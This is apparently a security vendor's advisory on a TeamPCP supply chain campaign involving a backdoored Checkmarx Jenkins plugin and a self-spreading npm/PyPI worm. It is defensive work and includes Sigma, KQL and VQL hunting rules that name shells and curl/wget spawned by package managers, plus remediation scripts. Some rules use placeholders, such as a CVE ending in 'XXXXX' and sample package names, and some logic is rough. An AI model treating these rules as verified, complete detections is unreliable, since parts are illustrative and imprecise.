TeamPCP Supply Chain Campaign: Checkmarx Jenkins Plugin & Mini Shai-Hulud Worm

Introduction

The TeamPCP threat actor has significantly escalated its supply chain operations, marking its most aggressive period since the Trivy disclosure in March. This campaign represents a critical pivot to high-value build infrastructure and developer ecosystems. Security Arsenal has tracked active confirmations of a compromised Checkmarx plugin for Jenkins, alongside the emergence of "Mini Shai-Hulud"—a self-spreading worm actively propagating through the npm and PyPI registries.

For defenders, this is not a theoretical risk. The compromise of CI/CD tools like Jenkins allows for immediate injection of malicious code into software artifacts, affecting downstream customers and production environments. The parallel use of package registry worms demonstrates a multi-vector approach designed to infiltrate development environments from multiple angles. Immediate action is required to identify compromised instances and halt the spread of the worm.

Technical Analysis

Affected Platforms & Products:

Jenkins: Checkmarx Plugin (specific versions compromised, see remediation).
Package Managers: npm (Node.js) and PyPI (Python).
Malware: Mini Shai-Hulud (Self-spreading worm).

Attack Chain & Mechanics: The TeamPCP campaign follows a classic supply chain attack model with an automated propagation component:

Jenkins Vector: The attacker compromised a specific version of the Checkmarx plugin. In Jenkins, plugins run with the privileges of the Jenkins controller process. The malicious plugin includes a backdoor that allows remote code execution (RCE), enabling the attacker to hijack the CI/CD pipeline, steal credentials, and move laterally within the build infrastructure.
Developer Vector (Mini Shai-Hulud): The worm targets npm and PyPI. It typically involves typosquatting or compromising legitimate packages. When a developer or build script runs npm install or pip install, the malicious package executes a post-install script. This script downloads the next stage of the Mini Shai-Hulud worm, which may self-replicate by scanning for other writable package directories or exfiltrating data to C2 servers.
Persistence: By infecting the build tools (Jenkins) and the dependencies (npm/PyPI), the attacker ensures persistence across the software development lifecycle (SDLC).

Exploitation Status:

Confirmed Active Exploitation: Yes. The Checkmarx Jenkins plugin compromise is officially confirmed.
Worm Activity: Mini Shai-Hulud is actively spreading across npm and PyPI.

Detection & Response

This activity requires a multi-layered detection approach focusing on CI/CD abuse and suspicious package manager behavior.

Sigma Rules

YAML

---
title: Potential Malicious Jenkins Plugin Execution - Checkmarx TeamPCP
id: 8a1b2c3d-4e5f-6a7b-8c9d-0e1f2a3b4c5d
status: experimental
description: Detects suspicious child processes spawned by the Jenkins Java process related to the Checkmarx plugin, indicative of the TeamPCP supply chain compromise.
references:
  - https://isc.sans.edu/diary/rss/32994
author: Security Arsenal
date: 2026/05/18
tags:
  - attack.execution
  - attack.t1059.001
  - attack.software_supply_chain
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith: '\java.exe'
    ParentCommandLine|contains: 'checkmarx'
  selection_child:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\pwsh.exe'
  condition: all of selection_*
falsepositives:
  - Legitimate Checkmarx plugin scripting (verify with admin)
level: critical
---
title: Suspicious Package Manager Post-Install Activity - Mini Shai-Hulud
id: 9b2c3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
status: experimental
description: Detects npm or pip spawning shells or making network connections immediately after execution, typical behavior of the Mini Shai-Hulud worm.
references:
  - https://isc.sans.edu/diary/rss/32994
author: Security Arsenal
date: 2026/05/18
tags:
  - attack.execution
  - attack.t1059.006
  - attack.command_and_control
  - attack.t1071.001
logsource:
  category: process_creation
  product: windows
detection:
  selection_pkg:
    Image|endswith:
      - '\npm.cmd'
      - '\npm.exe'
      - '\pip.exe'
      - '\python.exe'
  selection_suspicious:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\curl.exe'
      - '\wget.exe'
  condition: selection_pkg and selection_suspicious
falsepositives:
  - Developer scripts using shell wrappers for installs (rare)
level: high

KQL (Microsoft Sentinel / Defender)

KQL — Microsoft Sentinel / Defender

// Hunt for TeamPCP Mini Shai-Hulud Worm activity via npm/pip
// Look for package managers initiating network connections or shells
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessName in~ ("npm.exe", "pip.exe", "python.exe", "node.exe")
| where InitiatingProcessFileName in~ ("cmd.exe", "powershell.exe", "bash.exe") or 
        (ProcessCommandLine contains "install" and 
         (ProcessCommandLine contains "http" or ProcessCommandLine contains "post-install"))
| project Timestamp, DeviceName, AccountName, ProcessName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| extend IoC = "Suspicious Package Install Chain"

// Hunt for Jenkins Checkmarx Plugin Compromise
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "java.exe"
| where InitiatingProcessCommandLine contains "checkmarx"
| where ProcessName in~ ("cmd.exe", "powershell.exe", "sh", "bash")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessCommandLine
| extend IoC = "Jenkins Checkmarx RCE"

Velociraptor VQL

VQL — Velociraptor

-- Hunt for Mini Shai-Hulud worm artifacts in npm and PyPI environments
SELECT FullPath, Mtime, Size, Mode
FROM glob(globs='/*/*/.npm/_cacache/**/*')
WHERE Mtime > now() - 7d
  AND Name =~ "malware"

-- Hunt for suspicious Jenkins plugin JAR modifications
SELECT FullPath, Mtime, Size, Mode
FROM glob(globs='C:\Program Files\Jenkins\plugins\checkmarx/**/*.hpi')
WHERE Mtime > now() - 30d
  AND Size < 10MB 
-- Note: Verify file size against vendor known-good hash; suspicious replacements often differ in size

-- Check for npm scripts invoking shells (Linux/Mac)
SELECT CommandLine, Exe, Username
FROM pslist()
WHERE Exe =~ 'npm'
  AND CommandLine =~ 'sh'
  OR CommandLine =~ 'bash'

Remediation Script

PowerShell

# PowerShell: Check Jenkins Checkmarx Plugin Version and Integrity
# Note: Update the $ExpectedHash and $SafeVersion with values from the official vendor advisory.

$JenkinsHome = "C:\Program Files\Jenkins"
$PluginDir = Join-Path $JenkinsHome "plugins"
$PluginName = "checkmarx"

Write-Host "[+] Auditing Jenkins Plugin: $PluginName" -ForegroundColor Cyan

# Locate the plugin file (hpi or jpi)
$PluginFile = Get-ChildItem -Path $PluginDir -Filter "$PluginName*.hpi" -ErrorAction SilentlyContinue
if (-not $PluginFile) {
    $PluginFile = Get-ChildItem -Path $PluginDir -Filter "$PluginName*.jpi" -ErrorAction SilentlyContinue
}

if ($PluginFile) {
    Write-Host "[!] Found Plugin: $($PluginFile.FullName)" -ForegroundColor Yellow
    Write-Host "    Modified: $($PluginFile.LastWriteTime)"
    
    # Compare against known safe version date (Example: March 1, 2026)
    if ($PluginFile.LastWriteTime -gt (Get-Date "2026-03-01")) {
        Write-Host "[CRITICAL] Plugin was recently modified. Potential compromise detected." -ForegroundColor Red
        Write-Host "[ACTION] Disable the plugin immediately via UI and download the latest version from the official Update Center."
    } else {
        Write-Host "[INFO] Plugin date appears stable, but verify version against advisory." -ForegroundColor Green
    }
} else {
    Write-Host "[INFO] Checkmarx plugin not found on this host." -ForegroundColor Gray
}

Bash / Shell

#!/bin/bash
# Bash: Hunt for Mini Shai-Hulud worm indicators in Node/Python environments

echo "[*] Scanning for suspicious npm packages..."
# Check for recently modified packages in node_modules that are not standard
find /home -type d -name "node_modules" -exec find {} -type f -name "*.js" -mtime -7 \; 2>/dev/null | head -20

echo "[*] Checking for unusual pip install activity..."
grep -r "pip install" ~/.bash_history | tail -10

echo "[*] Checking for known malicious package names (Mini Shai-Hulud indicators)"
# List of example indicators (replace with actual IoCs from threat intel)
MALICIOUS_PKGS=("malicious-pkg-example" "shai-hulud-worm")
for pkg in "${MALICIOUS_PKGS[@]}"; do
  if npm list -g | grep -q "$pkg"; then
    echo "[ALERT] Suspicious npm package found: $pkg"
  fi
done

Remediation

Jenkins Checkmarx Plugin:
- Immediate Action: Disable the Checkmarx plugin immediately via the Jenkins Manage Plugins interface to halt any active command and control (C2) or data exfiltration.
- Patch: Navigate to the Plugin Manager and update to the latest version. Ensure the update is sourced directly from the official Jenkins Update Center or Checkmarx distribution.
- Credential Rotation: Treat the Jenkins controller and any build agents as compromised. Rotate all credentials (API keys, cloud provider keys, repository tokens) stored in Jenkins or accessible by build jobs.
npm / PyPI (Mini Shai-Hulud):
- Developer Workstations: Run npm audit and pip check on all developer workstations and build servers. Force clean installs (rm -rf node_modules and package-lock. followed by npm install) to ensure no malicious artifacts remain.
- Supply Chain Hygiene: Implement lockfiles (package-lock., requirements.txt) and review them rigorously in CI/CD pipelines. Do not allow builds to proceed if lockfiles are changed unexpectedly.
Vendor Advisory:
- Refer to the official Checkmarx Security Advisory for the specific CVEs (e.g., CVE-2025-XXXXX) and safe versions associated with this campaign.
- Monitor the SANS ISC Diary for updates on the malicious package names used in the Mini Shai-Hulud worm.

Related Resources

Security Arsenal Penetration Testing Services AlertMonitor Platform Book a SOC Assessment vulnerability-management Intel Hub